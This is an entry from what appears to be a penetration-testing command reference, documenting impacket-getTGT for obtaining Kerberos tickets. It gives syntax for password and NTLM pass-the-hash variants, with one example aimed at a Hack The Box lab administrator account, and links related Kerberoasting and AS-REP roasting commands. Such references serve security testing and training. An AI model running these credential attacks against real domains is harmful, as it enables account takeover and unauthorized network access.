Impacket Get TGT
Get TGT to be used in Kerberos authentication
- Tool
- impacket-getTGT
- Category
- Credential Attacks / Kerberoasting
- Platform
- linux
- Requires
- password
- Protocols
- KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-getTGT '<domain>/<user>:<password>' -dc-ip <ip>; export KRB5CCNAME='<user>.ccache'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-getTGT -hashes ':<hash>' '<domain>/<user>' -dc-ip <ip>; export KRB5CCNAME='<user>.ccache'
Examples
impacket-getTGT 'CORP.LOCAL/user:password' -dc-ip 192.168.1.100; export KRB5CCNAME='user.ccache'
impacket-getTGT -hashes ':e656e07c56d831611b577b160b259ad2' voleur.htb/administrator -dc-ip 10.10.11.76
Tags
Related commands
- NetExec SMB Auth Test Test SMB authentication with various credential types
- Impacket AS-REP Roast AS-REP Roasting for accounts without Kerberos Pre-Authentication
- Impacket Kerberoast Extract service account hashes via Kerberoasting
- Impacket KeyListAttack Abuse RODC (Read-Only DC) credential caching to retrieve hashes for accounts cached on…
- Impacket Targeted Kerberoast Request a TGS only for a specific service account instead of every kerberoastable user…
- NetExec LDAP AS-REP Roasting Request AS-REP responses for every account with DONT_REQ_PREAUTH set and write hashes to…
- NetExec LDAP Kerberoasting Request TGS tickets for every account with a SPN and write hashes to a file ready for…
- NetExec LDAP Pre-Windows 2000 Accounts Enumerate pre-Windows 2000 compatible computer accounts that use the hostname as password